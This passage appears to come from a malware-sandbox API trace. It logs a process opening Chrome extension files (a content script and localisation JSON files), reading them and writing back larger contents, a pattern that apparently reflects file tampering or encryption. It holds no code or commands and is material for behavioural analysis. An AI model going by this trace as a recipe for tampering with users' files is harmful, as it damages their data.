lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.663] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c55e8, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c55e8*, lpNumberOfBytesRead=0x345f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0140.665] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0140.665] WriteFile (in: hFile=0x1cc, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x345f2d0*=0x669, lpOverlapped=0x0) returned 1 [0140.665] CloseHandle (hObject=0x1cc) returned 1 [0140.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.472] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.472] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1103 [0144.472] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.472] ReleaseMutex (hMutex=0x168) returned 1 [0144.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="contentscript_bin_prod.js", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="contentscript_bin_prod.js", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="contentscript_bin_prod.js", lpUsedDefaultChar=0x0) returned 25 [0144.472] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1103, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x345f2bc*=0x1103, lpOverlapped=0x0) returned 1 [0144.474] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.474] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x168b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x345f2d0*=0x168b, lpOverlapped=0x0) returned 1 [0144.474] CloseHandle (hObject=0x1f0) returned 1 [0144.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa7 [0144.477] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.477] ReleaseMutex (hMutex=0x168) returned 1 [0144.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.477] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f37ed8, nNumberOfBytesToRead=0xa7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37ed8*, lpNumberOfBytesRead=0x345f2bc*=0xa7, lpOverlapped=0x0) returned 1 [0144.478] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.478] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x62f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x62f, lpOverlapped=0x0) returned 1 [0144.479] CloseHandle (hObject=0x1f0) returned 1 [0144.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.480] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.480] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb2 [0144.480] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.480] ReleaseMutex (hMutex=0x168) returned 1 [0144.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.480] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f37ed8, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37ed8*, lpNumberOfBytesRead=0x345f2bc*=0xb2, lpOverlapped=0x0) returned 1 [0144.481] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.481] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x63a, lpOverlapped=0x0) returned 1 [0144.481] CloseHandle (hObject=0x1f0) returned 1 [0144.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.482] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.482] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xc7 [0144.482] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.482] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.482] ReleaseMutex (hMutex=0x168) returned 1 [0144.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.482] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xc7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x345f2bc*=0xc7, lpOverlapped=0x0) returned 1 [0144.484] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.484] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x64f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x64f, lpOverlapped=0x0) returned 1 [0144.484] CloseHandle (hObject=0x1f0) returned 1 [0144.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.485] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.486] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x299 [0144.486] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.486] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.486] ReleaseMutex (hMutex=0x168) returned 1 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.486] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x299, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x299, lpOverlapped=0x0) returned 1 [0144.488] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.488] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x821, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x345f2d0*=0x821, lpOverlapped=0x0) returned 1 [0144.488] CloseHandle (hObject=0x1f0) returned 1 [0144.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.489] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.489] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x147 [0144.489] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.490] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.490] ReleaseMutex (hMutex=0x168) returned 1 [0144.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.490] ReadFile (in: hFile=0x1f0, lpBuffer=0x25e9498, nNumberOfBytesToRead=0x147, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9498*, lpNumberOfBytesRead=0x345f2bc*=0x147, lpOverlapped=0x0) returned 1 [0144.491] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.491] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6cf, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x6cf, lpOverlapped=0x0) returned 1 [0144.491] CloseHandle (hObject=0x1f0) returned 1 [0144.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xcb [0144.493] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.493] ReleaseMutex (hMutex=0x168) returned 1 [0144.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.493] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcb, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x345f2bc*=0xcb, lpOverlapped=0x0) returned 1 [0144.494] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.494] WriteFile (in: hFile=0x1f0, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x653, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x653, lpOverlapped=0x0) returned 1 [0144.495] CloseHandle (hObject=0x1f0) returned 1 [0144.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.496] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.496] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x119 [0144.496] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.496] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.496] ReleaseMutex (hMutex=0x168) returned 1 [0144.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.496] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ec7468, nNumberOfBytesToRead=0x119, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec7468*, lpNumberOfBytesRead=0x345f2bc*=0x119, lpOverlapped=0x0) returned 1 [0144.497] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.497] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x6a1, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x6a1, lpOverlapped=0x0) returned 1 [0144.498] CloseHandle (hObject=0x1f0) returned 1 [0144.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.499] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.499] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x115 [0144.499] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.500] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.500] ReleaseMutex (hMutex=0x168) returned 1 [0144.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0144.500] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ec7468, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec7468*, lpNumberOfBytesRead=0x345f2bc*=0x115, lpOverlapped=0x0) returned 1 [0144.501] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0144.502] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x69d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x345f2d0*=0x69d, lpOverlapped=0x0) returned 1 [0144.502] CloseHandle (hObject=0x1f0) returned 1 [0144.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0144.503] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.504] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xaa [0144.504] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0144.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0144.504] ReleaseMutex (hMutex=0x168) returned 1 [0144.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 